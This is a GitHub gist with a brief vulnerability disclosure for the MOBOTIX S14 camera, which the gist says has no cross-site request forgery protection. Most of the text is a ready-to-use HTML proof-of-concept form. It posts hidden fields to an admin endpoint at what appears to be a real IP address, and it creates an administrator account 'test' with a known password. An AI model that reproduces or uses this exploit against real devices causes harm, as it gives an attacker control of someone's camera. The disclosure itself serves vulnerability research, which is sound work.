Skip to content

Instantly share code, notes, and snippets.

  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save llandeilocymro/55a61e3730cdef56ab5806a677ba0891 to your computer and use it in GitHub Desktop.
Summary
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery (CSRF) attacks.
Impact
Successful exploitation of this vulnerability can lead to the takeover of the device.
Deatils
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery attacks.
This can lead to allow a local account password to be changed without the knowledge of the authenticated user.
POC - the following PoC will add a test user, with a password of 'aaaaa'. Note, this user has admin priviledges.
<html>
<body>
<form method="POST" action="http://82.71.22.180:8001/admin/access">
<input type="hidden" name="user_name_0" value="admin"/>
<input type="hidden" name="user_group_0" value="admins"/>
<input type="hidden" name="user_passwd_a_0" value="***"/>
<input type="hidden" name="user_passwd_b_0" value="***"/>
<input type="hidden" name="user_name_1" value="rayspeed"/>
<input type="hidden" name="user_group_1" value="users"/>
<input type="hidden" name="user_passwd_a_1" value="***"/>
<input type="hidden" name="user_passwd_b_1" value="***"/>
<input type="hidden" name="user_name_2" value="test"/>
<input type="hidden" name="user_group_2" value="admins"/>
<input type="hidden" name="user_passwd_a_2" value="aaaaa"/>
<input type="hidden" name="user_passwd_b_2" value="aaaaa"/>
<input type="hidden" name="sv_passwd_a" value=""/>
<input type="hidden" name="sv_passwd_b" value=""/>
<input type="hidden" name="save_config" value="Set"/>
<input type="submit" value="Submit">
</form>
</body>
<html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment